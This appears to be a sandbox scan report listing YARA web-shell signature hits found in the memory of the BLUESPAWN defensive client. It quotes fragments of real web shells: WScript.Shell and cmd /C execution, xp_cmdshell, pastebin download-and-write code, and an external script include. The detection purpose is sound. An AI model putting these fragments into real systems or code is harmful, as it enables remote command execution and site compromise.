Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_ajan_2 | Webshells Auto-generated - file ajan.asp | Yara Bulk Rule Generator by Florian Roth | - 0x2e0b5f:$s2: "Set WshShell = CreateObject(""WScript.Shell"")
- 0x320af3:$s2: "Set WshShell = CreateObject(""WScript.Shell"")
- 0x342709:$s2: "Set WshShell = CreateObject(""WScript.Shell"")
- 0x36fc71:$s2: "Set WshShell = CreateObject(""WScript.Shell"")
- 0x320b2f:$s3: /file.zip
- 0x36fca3:$s3: /file.zip
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Webshell_and_Exploit_CN_APT_HK | Webshell and Exploit Code in relation with APT against Honk Kong protesters | Florian Roth | - 0x320c9a:$a0: <script language=javascript src=http://java-se.com/o.js</script>
- 0x320ce7:$s0: <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
- 0x36fdc9:$s0: <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
- 0x320d57:$s1: <input type="hidden" name="doing" value="login">
- 0x36fe2f:$s1: <input type="hidden" name="doing" value="login">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JSP_Browser_APT_webshell | VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a | F.Roth | - 0x320e80:$a1a: private static final String[] COMMAND_INTERPRETER = {"
- 0x36fef8:$a1a: private static final String[] COMMAND_INTERPRETER = {"
- 0x320ec3:$a1b: cmd", "/C"}; // Dos,Windows
- 0x36ff32:$a1b: cmd", "/C"}; // Dos,Windows
- 0x320eeb:$a2: Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
- 0x36ff50:$a2: Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
- 0x320f3f:$a3: ret.append("!!!! Process has timed out, destroyed !!!!!");
- 0x36ff9a:$a3: ret.append("!!!! Process has timed out, destroyed !!!!!");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JSP_jfigueiredo_APT_webshell | JSP Browser used as web shell by APT groups - author: jfigueiredo | F.Roth | - 0x3210cb:$a1: String fhidden = new String(Base64.encodeBase64(path.getBytes()));
- 0x3700ab:$a1: String fhidden = new String(Base64.encodeBase64(path.getBytes()));
- 0x32111a:$a2: <form id="upload" name="upload" action="ServFMUpload" method="POST" enctype="multipart/form-data">
- 0x3700f0:$a2: <form id="upload" name="upload" action="ServFMUpload" method="POST" enctype="multipart/form-data">
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JSP_jfigueiredo_APT_webshell_2 | JSP Browser used as web shell by APT groups - author: jfigueiredo | F.Roth | - 0x3212c5:$a1: <div id="bkorotator"><img alt="" src="images/rotator/1.jpg"></div>
- 0x370220:$a1: <div id="bkorotator"><img alt="" src="images/rotator/1.jpg"></div>
- 0x321314:$a2: $("#dialog").dialog("destroy");
- 0x370265:$a2: $("#dialog").dialog("destroy");
- 0x321340:$s1: <form id="form" action="ServFMUpload" method="post" enctype="multipart/form-data">
- 0x370287:$s1: <form id="form" action="ServFMUpload" method="post" enctype="multipart/form-data">
- 0x32139f:$s2: <input type="hidden" id="fhidden" name="fhidden" value="L3BkZi8=" />
- 0x3702dc:$s2: <input type="hidden" id="fhidden" name="fhidden" value="L3BkZi8=" />
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Webshell_Insomnia | Insomnia Webshell - file InsomniaShell.aspx | Florian Roth | - 0x3215ac:$s0: Response.Write("- Failed to create named pipe:");
- 0x3215ea:$s1: Response.Output.Write("+ Sending {0}<br>", command);
- 0x32162b:$s2: String command = "exec master..xp_cmdshell 'dir > \\\\127.0.0.1
- 0x3704b6:$s2: String command = "exec master..xp_cmdshell 'dir > \\\\127.0.0.1
- 0x321677:$s3: Response.Write("- Error Getting User Info<br>");
- 0x3216b4:$s4: string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,
- 0x321703:$s5: [DllImport("Advapi32.dll", SetLastError = true)]
- 0x321740:$s9: username = DumpAccountSid(tokUser.User.Sid);
- 0x321779:$s14: //Response.Output.Write("Opened process PID: {0} : {1}<br>", p
- 0x3705d3:$s14: //Response.Output.Write("Opened process PID: {0} : {1}<br>", p
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SoakSoak_Infected_Wordpress | Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX | Florian Roth | - 0x321ab8:$s0: wp_enqueue_script("swfobject");
- 0x321ae4:$s1: function FuncQueueObject()
- 0x321b0b:$s2: add_action("wp_enqueue_scripts", 'FuncQueueObject');
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Pastebin_Webshell | Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs | Florian Roth | - 0x321cbc:$s0: file_get_contents("http://pastebin.com
- 0x37093f:$s0: file_get_contents("http://pastebin.com
- 0x321cef:$s1: xcurl('http://pastebin.com/download.php
- 0x370968:$s1: xcurl('http://pastebin.com/download.php
- 0x321d23:$s2: xcurl('http://pastebin.com/raw.php
- 0x370992:$s2: xcurl('http://pastebin.com/raw.php
- 0x321d52:$x0: if($content){unlink('evex.php');
- 0x3709b7:$x0: if($content){unlink('evex.php');
- 0x321d7f:$x1: $fh2 = fopen("evex.php", 'a');
- 0x3709da:$x1: $fh2 = fopen("evex.php", 'a');
- 0x321daa:$y0: file_put_contents($pth
- 0x3709fb:$y0: file_put_contents($pth
- 0x321dcd:$y1: echo "<login_ok>
- 0x370a14:$y1: echo "<login_ok>
- 0x321dea:$y2: str_replace('* @package Wordpress',$temp
- 0x370a27:$y2: str_replace('* @package Wordpress',$temp
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ASPXspy2 | Web shell - file ASPXspy2.aspx | Florian Roth | - 0x321f69:$s0: string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin
- 0x370b15:$s0: string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin
- 0x321fbd:$s1: SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" O
- 0x370b5f:$s1: SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" O
- 0x322014:$s3: Process[] p=Process.GetProcesses();
- 0x322044:$s4: Response.Cookies.Add(new HttpCookie(vbhLn,Password));
- 0x322086:$s5: [DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
- 0x3220c9:$s6: <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssCl
- 0x370c43:$s6: <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssCl
- 0x322122:$s7: ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();
- 0x32217f:$s8: Copyright © 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_bla
- 0x370ce5:$s8: Copyright © 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_bla
- 0x3221d9:$s10: Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.
- 0x370d36:$s10: Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.
- 0x322232:$s11: nxeDR.Command+=new CommandEventHandler(this.iVk);
- 0x322270:$s12: <%@ import Namespace="System.ServiceProcess"%>
- 0x3222ab:$s13: foreach(string innerSubKey in sk.GetSubKeyNames())
- 0x3222ea:$s17: Response.Redirect("http://www.rootkit.net.cn");
- 0x322326:$s20: else if(Reg_Path.StartsWith("HKEY_USERS"))
|